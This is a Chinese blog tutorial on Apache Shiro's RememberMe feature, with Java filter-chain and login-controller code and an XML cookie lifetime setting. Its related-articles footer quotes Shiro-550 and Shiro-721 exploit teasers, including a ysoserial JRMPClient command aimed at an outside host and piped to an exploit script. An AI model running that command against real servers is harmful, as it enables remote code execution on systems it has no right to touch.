Shiro系列十五:Rememberme

最新推荐文章于 2024-05-06 08:30:00 发布
最新推荐文章于 2024-05-06 08:30:00 发布
阅读量507 收藏
点赞数
分类专栏: Shiro
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lizhiqiang1217/article/details/91134235
版权

 Shiro 提供了记住我(RememberMe)的功能,比如访问如淘宝等一些网站时,关闭了浏览器,下次再打开时还是能记住你是谁, 下次访问时无需再登录即可访问,基本流程如下:
 1、首先在登录页面选中 RememberMe 然后登录成功;如果是浏览器登录,一般会把 RememberMe 的Cookie 写到客户端并保存下来;
 2、关闭浏览器再重新打开;会发现浏览器还是记住你的;
 3、访问一般的网页服务器端还是知道你是谁,且能正常访问;
 4、但是比如我们访问淘宝时,如果要查看我的订单或进行支付时,此时还是需要再进行身份认证的,以确保当前用户还是你。

认证和记住我
 subject.isAuthenticated() 表示用户进行了身份验证登录的, 即使有 Subject.login 进行了登录;
 subject.isRemembered():表示用户是通过记住我登录的, 此时可能并不是真正的你(如你的朋友使用你的电脑,或者你的cookie 被窃取)在访问的。
 两者只能二选一,即 subject.isAuthenticated()==true,则 subject.isRemembered()==false;反之一样。

建议:
 访问一般网页:如个人在主页之类的,我们使用user 拦截器即可,user 拦截器只要用户登录 (isRemembered() || isAuthenticated())过即可访问成功;
 访问特殊网页:如我的订单,提交订单页面,我们使用 authc 拦截器即可,authc 拦截器会判断用户是否是通过 Subject.login(isAuthenticated()==true)登录的,如果是才放行,否则会跳转到登录页面重新登录。

测试:
1、设置访问权限

public class FilterChainDefinitionMapBuilder {

	public LinkedHashMap<String, String> buildFilterChainDefinitionMap(){
		LinkedHashMap<String, String> map = new LinkedHashMap<>();
		
		map.put("/login.jsp", "anon");
		map.put("/shiro/login", "anon");
		map.put("/shiro/logout", "logout");
		map.put("/user.jsp", "authc,roles[user]");
		map.put("/admin.jsp", "authc,roles[admin]");
		map.put("/list.jsp", "user");
		
		map.put("/**", "authc");
		
		return map;
	}
	
}

2、开启记住我功能。token.setRememberMe(true)

@Controller
@RequestMapping("/shiro")
public class ShiroHandler {
	
	@RequestMapping("/login")
	public String login(@RequestParam("username") String username,
			@RequestParam("password") String password){
		Subject currentUser = SecurityUtils.getSubject();

		if (!currentUser.isAuthenticated()) {
        	// 把用户名和密码封装为 UsernamePasswordToken 对象
            UsernamePasswordToken token = new UsernamePasswordToken(username, password);
            // rememberme
            token.setRememberMe(true);
            try {
            	System.out.println("1. " + token.hashCode());
            	// 执行登录.
                currentUser.login(token);
            } catch (AuthenticationException ae) { // 所有认证时异常的父类.
            	System.out.println("登录失败: " + ae.getMessage());
            }
        }

		return "redirect:/list.jsp";
	}

}

3、在 securityManager 中通过设置属性 rememberMeManager.cookie.maxAge 来设置记住我的时间。单位是秒

<bean id="securityManager" class="org.apache.shiro.web.mgt.DefaultWebSecurityManager">
    <property name="cacheManager" ref="cacheManager"/>
    <property name="authenticator" ref="authenticator"></property>
    
    <property name="realms">
    	<list>
			<ref bean="jdbcRealm"/>
			<ref bean="secondRealm"/>
		</list>
    </property>
    
    <property name="rememberMeManager.cookie.maxAge" value="10"></property>
</bean>
苍穹尘
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SHIRO-721:RememberMe填充Oracle漏洞RCE
03-08
SHIRO-721 RememberMe填充Oracle漏洞RCE 0x00简介: cookie的cookiememeMe已通过AES-128-CBC模式加密,这很容易受到填充oracle攻击的影响。 攻击者可以使用有效的RememberMe cookie作为填充Oracle Attack的前缀,...
SHIRO-550:Shiro RememberMe 1.2.4反序列化突破
03-10
Shiro RememberMe 1.2.4反序列化突破(SHIRO-550)commons-collections-3.2.1.jar java -jar ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient "10.10.20.166:12345" |python exp.py java -cp ysoserial-0.0.6-SNAPSHOT...
Shiro 实现 RememberMe 功能
暗星涌动
10-08 5397
本文内容:Shiro 中RememberMe 功能的介绍以及实现。1介绍Shiron 提供了记住我(RememberMe)的功能,比如访问如淘宝等一些网站时,关闭了浏览器...
shiro + jwt 实现 请求头中的 rememberMe 时间限制功能
weixin_30519071的博客
07-11 532
前言:   上一篇提出, 通过修改 rememberMe 的编码来实现 rememberMe的功能的设想, 事后我去尝试实现了一番, 发现太麻烦, 还是不要那么做吧. 程序还是要越简单越好.   那功能总是要实现的啊, 总不能因为麻烦, 就把功能给砍了吧.   so, 换条路试试:   在前后端项目中, app和后台之间的登录, 并不能通过cookie来维持, 有一种常使用的技术: j...
Shiro——rememberMe允许用户在下次访问应用时免除重新登录,保持持久性的登录状态
最新发布
程序员阿皓的博客
05-06 141
Shiro——rememberMe允许用户在下次访问应用时免除重新登录,保持持久性的登录状态
SpringBoot学习:整合shiro(rememberMe记住我功能)
热门推荐
期待破茧成蝶
04-08 1万+
项目下载地址:http://download.csdn.NET/detail/aqsunkai/9805821 首先在shiro配置类中注入rememberMe管理器 /** * cookie对象; * rememberMeCookie()方法是设置Cookie的生成模版,比如cookie的name,cookie的有效时间等等。 * @return */ @Bean public
shiro 实例 rememberMe
zmq52007的博客
12-22 342
RememberMe Shiro 提供了记住我(RememberMe)的功能,关闭了浏览器下次再打开时还是能记住你是谁,下次访问时无需再登录即可访问,基本流程如下: 首先在登录页面选中 RememberMe 然后登录成功;如果是浏览器登录,一般会把 RememberMe 的 Cookie 写到客户端并保存下来; 关闭浏览器再重新打开;会发现浏览器还是记住你的; 访问一般的网页服务器端还是知
Shiro实现单一登录,并保留使用RememberMe功能。
sihan2018的博客
03-05 1151
单一登录:同一个账户同一时间只能在一个地方登录。 项目Spring+SpringMVC+Mybatis,引入了Shiro作认证授权。公司要求实现一个单一登录功能,大部分人做法都是在自定义实现Realm的doGetAuthenticationInfo里面做session过滤和删除,这在没有启用Shiro的rememberMe功能是可以生效的,但是启用了rememberMe功能后,会发现session...
跟我学Shiro第13章Demo(RememberMe)
09-23
"跟我学Shiro第13章Demo(RememberMe)"是一个实战教程,旨在帮助开发者理解并实现Shiro中的RememberMe特性。RememberMe功能允许用户在一段时间内免于重新登录,提高了用户体验。 在这个Demo中,我们将探讨以下几个...
CVE-2016-4437 Shiro550 & Shiro721 RememberMe Padding Oracle 漏洞利用
03-29
CVE-2016-4437 Shiro550 & Shiro721 RememberMe Padding Oracle Shiro721 RememberMe Padding Oracle影响版本: - Apache Shiro 1.2.5,1.2.6,1.3.0,1.3.1,1.3.2,1.4.0-RC2,1.4.0,1.4.1 CVE-2016-4437 ...
ShiroScan:Shiro RememberMe 1.2.4反序列化入侵图形化检测工具(Shiro-550)
03-18
Shiro反序列化检测工具 ShiroScan用于检测存在四郎反序列化漏洞的关键值。有三种方式进行检测,第一种是利用URLDNS进行检测,第二种利用命令执行进行检测,第三种使用SimplePrincipalCollection序列化后进行检测...
SpringBoot2 学习9 集成Shiro 记住我
心猿意码
08-24 533
导包 <!-- shiro-spring --> <dependency> <groupId>org.apache.shiro</groupId> <artifactId>shiro-spring</artifactId> <version>1.4.0</versio...
Shiro进阶(四)Shiro之RememberMe
web13985085406的博客
04-22 1437
前言 本章讲解一下Shiro的记住我的功能 方法 1.概念 首先要澄清一点的是,这里的记住我并不是记住用户名和密码。 shiro的记住我是一种基于cookie实现的方式,特定的页面在关掉浏览器后(session消失)也可以进行访问的功能! 2.实现步骤 1)前台登录页面修改 如果需要记住我的功能,那么前台页面需要一个checkbox多选框来让用户进行勾选。 这里我就不进行说明了。丑一点没关系哈。 2)controller登录方法修改 3)修改shiro配置文件 <!-- 配置Shiro的Secur
Shiro记住我(RememberMe)
Hern(宋兆恒)
12-17 6072
简介 Shiro 提供了记住我(RememberMe)的功能,比如访问如淘宝 等一些网站时,关闭了浏览器,下次再打开时还是能记住你是谁, 下次访问时无需再登录即可访问,基本流程如下: • 登录页面选中RememberMe然后登录成功;如果是浏览器登录,一般会把RememberMe 的Cookie写到客户端并保存下来; 关闭浏览器再重新打开;会发现浏览器还是记住你的; 访问一般的网页服务器端...
Shiro的rememberMe功能
weixin_65824274的博客
07-05 1544
当登录后是可以正常访问/man的主页的,如果使用了记住我功能,会在浏览器写入cookie,关掉浏览器不需要登录即可直接访问/main.Shiro 提供了记住我(RememerMe)的功能,比如访问一些网站时,关闭了浏览器,下次再打开时还是能记住你是谁,下次访问时无需再登录即可访问。4.但是,如果我们访问电商平台时,如果要查看我的订单或进行支付时,此时还 是需要再进行身份认证的,以确保当前用户还是你。2.登录时不勾选记住我,关闭浏览器访问主页/main还会拦截到登录页;1.配置记住我功能的cookie设置;
apache shiro remember me 不起作用
u012418561的博客
11-30 1241
项目使用了shiro进行认证,使用了rememberMe过滤器,死活不起作用 原因:浏览器对cookie的大小有限制,总大小不能超过4K,服务器返回给浏览器的cookie有5k多,所以浏览器直接忽略了cookie而没有保存rememberMe这个cookie。 解决: 要缩短cookie的长度,就需要减少session的数据量,我因为把整个用户的数据(包括菜单资源)全部放到了session中
Shiro RememberMe反序列化漏洞复现(Shiro-550)
box
11-28 4949
0x00 漏洞原理简要分析 官方说明:https://issues.apache.org/jira/browse/SHIRO-550 Shiro提供了记住我(RememberMe)的功能,关闭了浏览器下次再打开时还是能记住你是谁,下次访问时无需再登录即可访问。 Shiro对rememberMe的cookie做了加密处理,shiro在CookieRememberMeManaer类中将cookie中rememberMe字段内容分别进行 : 序列化 =>AES加密 =>Base64编码操作 在识别身份
Shiro笔记五(缓存、Rememberme):
Welcome
08-21 2104
五、缓存 25. Shiro_缓存 CacheManagerAware是个接口。如果实现了这个接口,shiro就会自动的把CacheManager注入给对象Realm。那么Realm对象就可以自动的使用缓存了。   点开Realm继承的父类,一直找到父类CachingRealm,可看到它是实现了这个接口的,所以说我们的Realm是默认有缓存的。   下面看一下实际的效果。以授权为例...
shiro的经典rememberMe
09-02
Shiro的经典RememberMe功能是一个基于cookie的身份认证机制。它允许用户在登录后保持身份认证的状态,即使用户关闭了浏览器或重新启动了系统。 RememberMe功能的实现原理是,当用户登录成功时,服务器会生成一个...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值